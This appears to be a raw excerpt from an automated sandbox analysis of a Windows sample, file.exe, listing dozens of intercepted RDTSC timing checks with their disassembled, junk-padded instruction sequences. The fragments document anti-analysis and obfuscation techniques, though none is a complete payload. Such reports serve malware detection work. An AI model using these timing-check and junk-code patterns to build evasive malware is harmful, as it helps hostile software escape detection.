Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1EA8F second address: C1EA99 instructions: 0x00000000 rdtsc 0x00000002 je 00007F423CC2AB1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1EA99 second address: C1EAAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jbe 00007F423D327E26h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1EAAC second address: C1EAE2 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F423CC2AB2Fh 0x00000008 jmp 00007F423CC2AB29h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F423CC2AB1Bh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1EAE2 second address: C1EAF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423D327E2Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1EAF2 second address: C1EB02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F423CC2AB1Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1ED63 second address: C1EDBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 jne 00007F423D327E2Ah 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jng 00007F423D327E36h 0x00000017 jmp 00007F423D327E30h 0x0000001c mov eax, dword ptr [eax] 0x0000001e jmp 00007F423D327E36h 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 push edx 0x00000028 pushad 0x00000029 jmp 00007F423D327E30h 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C24C98 second address: C24CA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F423CC2AB16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C24CA2 second address: C24CC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jns 00007F423D327E26h 0x0000000d jmp 00007F423D327E37h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C24CC8 second address: C24CCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C24CCD second address: C24CD9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C24CD9 second address: C24D06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F423CC2AB20h 0x0000000b popad 0x0000000c jmp 00007F423CC2AB1Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 jnl 00007F423CC2AB16h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C24D06 second address: C24D0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2539A second address: C253A3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2AC0C second address: C2AC2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jmp 00007F423D327E2Eh 0x0000000b jne 00007F423D327E26h 0x00000011 pop edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2AC2E second address: C2AC5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jmp 00007F423CC2AB29h 0x0000000b pop edi 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f jmp 00007F423CC2AB1Ah 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C29A66 second address: C29A6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C29A6C second address: C29A94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F423CC2AB1Eh 0x0000000c jmp 00007F423CC2AB23h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF5701 second address: BF570B instructions: 0x00000000 rdtsc 0x00000002 jno 00007F423D327E26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF570B second address: BF5710 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF5710 second address: BDA568 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov ecx, dword ptr [ebp+122D3446h] 0x00000010 lea eax, dword ptr [ebp+1248A4B3h] 0x00000016 pushad 0x00000017 mov eax, dword ptr [ebp+122D20EEh] 0x0000001d mov edx, dword ptr [ebp+122D2EC7h] 0x00000023 popad 0x00000024 push eax 0x00000025 jmp 00007F423D327E30h 0x0000002a mov dword ptr [esp], eax 0x0000002d push 00000000h 0x0000002f push edx 0x00000030 call 00007F423D327E28h 0x00000035 pop edx 0x00000036 mov dword ptr [esp+04h], edx 0x0000003a add dword ptr [esp+04h], 00000019h 0x00000042 inc edx 0x00000043 push edx 0x00000044 ret 0x00000045 pop edx 0x00000046 ret 0x00000047 call dword ptr [ebp+122D27D1h] 0x0000004d push ebx 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF5C0B second address: BF5C0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF5C0F second address: A3EBEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov edx, dword ptr [ebp+122D2ABFh] 0x0000000e push dword ptr [ebp+122D0D81h] 0x00000014 sub dword ptr [ebp+122D333Eh], edi 0x0000001a call dword ptr [ebp+122D391Ah] 0x00000020 pushad 0x00000021 pushad 0x00000022 jc 00007F423D327E2Ch 0x00000028 mov edx, dword ptr [ebp+122D2C1Bh] 0x0000002e mov dword ptr [ebp+122D1E08h], edx 0x00000034 popad 0x00000035 jo 00007F423D327E32h 0x0000003b xor eax, eax 0x0000003d cld 0x0000003e sub dword ptr [ebp+122D1E08h], eax 0x00000044 mov edx, dword ptr [esp+28h] 0x00000048 sub dword ptr [ebp+122D1E08h], esi 0x0000004e mov dword ptr [ebp+122D2AF7h], eax 0x00000054 pushad 0x00000055 mov ecx, dword ptr [ebp+122D2AF3h] 0x0000005b mov dword ptr [ebp+122D2FE7h], ebx 0x00000061 popad 0x00000062 mov esi, 0000003Ch 0x00000067 jo 00007F423D327E2Ch 0x0000006d sub dword ptr [ebp+122D2FE7h], edx 0x00000073 add esi, dword ptr [esp+24h] 0x00000077 cmc 0x00000078 lodsw 0x0000007a jmp 00007F423D327E35h 0x0000007f add eax, dword ptr [esp+24h] 0x00000083 mov dword ptr [ebp+122D1CA7h], ecx 0x00000089 mov ebx, dword ptr [esp+24h] 0x0000008d jc 00007F423D327E34h 0x00000093 pushad 0x00000094 sub dword ptr [ebp+122D1CA7h], esi 0x0000009a sub edi, dword ptr [ebp+122D2CB3h] 0x000000a0 popad 0x000000a1 push eax 0x000000a2 pushad 0x000000a3 push eax 0x000000a4 push edx 0x000000a5 jnc 00007F423D327E26h 0x000000ab rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF5C59 second address: BF5C94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423CC2AB25h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 5FB92171h 0x00000010 mov edi, dword ptr [ebp+122D2505h] 0x00000016 sbb edx, 1CCD5240h 0x0000001c call 00007F423CC2AB19h 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 pop eax 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF5C94 second address: BF5C98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF5C98 second address: BF5C9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF5C9E second address: BF5CB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F423D327E26h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF5CB0 second address: BF5CB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF5CB4 second address: BF5D0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007F423D327E30h 0x00000010 mov eax, dword ptr [eax] 0x00000012 push edi 0x00000013 jbe 00007F423D327E2Ch 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e pushad 0x0000001f pushad 0x00000020 jnp 00007F423D327E26h 0x00000026 jmp 00007F423D327E2Dh 0x0000002b popad 0x0000002c pushad 0x0000002d jmp 00007F423D327E30h 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF5F8B second address: BF5FAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop esi 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007F423CC2AB1Dh 0x0000000f mov eax, dword ptr [eax] 0x00000011 push edi 0x00000012 pushad 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF653E second address: BF6542 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF6542 second address: BF6550 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F423CC2AB16h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF6550 second address: BF6554 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF6554 second address: BF65BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F423CC2AB18h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 sub dword ptr [ebp+122D36DAh], ecx 0x0000002a call 00007F423CC2AB1Eh 0x0000002f pop ecx 0x00000030 push 0000001Eh 0x00000032 push 00000000h 0x00000034 push ebp 0x00000035 call 00007F423CC2AB18h 0x0000003a pop ebp 0x0000003b mov dword ptr [esp+04h], ebp 0x0000003f add dword ptr [esp+04h], 00000014h 0x00000047 inc ebp 0x00000048 push ebp 0x00000049 ret 0x0000004a pop ebp 0x0000004b ret 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f jno 00007F423CC2AB18h 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF68AF second address: BF68B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BAE0F8 second address: BAE12F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F423CC2AB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b jmp 00007F423CC2AB1Fh 0x00000010 push edi 0x00000011 pop edi 0x00000012 pop edx 0x00000013 jmp 00007F423CC2AB27h 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BAE12F second address: BAE135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C29DA9 second address: C29DAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2A075 second address: C2A079 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2A079 second address: C2A081 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2A081 second address: C2A08D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edx 0x00000004 pop edx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2A08D second address: C2A091 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2A7BB second address: C2A7C3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2A7C3 second address: C2A7E9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 jmp 00007F423CC2AB28h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2A7E9 second address: C2A801 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F423D327E26h 0x00000008 jmp 00007F423D327E2Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2A801 second address: C2A810 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F423CC2AB1Ah 0x00000008 push edx 0x00000009 pop edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2A810 second address: C2A816 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3451C second address: C3452E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F423CC2AB1Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3452E second address: C34534 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BAC616 second address: BAC63E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F423CC2AB23h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F423CC2AB1Ch 0x00000014 jnp 00007F423CC2AB16h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BAC63E second address: BAC657 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F423D327E33h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3325F second address: C3326A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F423CC2AB16h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3326A second address: C33270 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C33270 second address: C33278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C32F7C second address: C32F84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C32F84 second address: C32FA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 jne 00007F423CC2AB34h 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F423CC2AB22h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C33D93 second address: C33D98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C33D98 second address: C33DB5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007F423CC2AB21h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C37987 second address: C3798D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3798D second address: C37991 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C37991 second address: C3799C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3BBE4 second address: C3BBED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3C120 second address: C3C147 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F423D327E26h 0x00000008 jmp 00007F423D327E36h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3C40F second address: C3C444 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423CC2AB26h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jmp 00007F423CC2AB27h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3C444 second address: C3C450 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F423D327E26h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3C6D2 second address: C3C6D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3C6D6 second address: C3C712 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F423D327E26h 0x00000008 jmp 00007F423D327E34h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jno 00007F423D327E3Eh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3B91A second address: C3B91E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C42E04 second address: C42E08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C42F71 second address: C42F75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C42F75 second address: C42F92 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F423D327E26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F423D327E31h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4311A second address: C43124 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F423CC2AB16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C47D51 second address: C47D70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F423D327E34h 0x0000000c popad 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4BBE4 second address: C4BC24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007F423CC2AB2Ch 0x0000000d push edx 0x0000000e jmp 00007F423CC2AB1Dh 0x00000013 jmp 00007F423CC2AB1Eh 0x00000018 pop edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4BC24 second address: C4BC3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F423D327E32h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB1733 second address: BB1737 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB1737 second address: BB174F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jne 00007F423D327E26h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pushad 0x00000010 popad 0x00000011 push edx 0x00000012 pop edx 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B148 second address: C4B153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B153 second address: C4B159 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B159 second address: C4B15D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B326 second address: C4B332 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F423D327E26h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B478 second address: C4B482 instructions: 0x00000000 rdtsc 0x00000002 je 00007F423CC2AB22h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B5ED second address: C4B603 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F423D327E2Ah 0x00000008 push esi 0x00000009 pop esi 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F423D327E26h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B603 second address: C4B607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B747 second address: C4B74E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B74E second address: C4B754 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
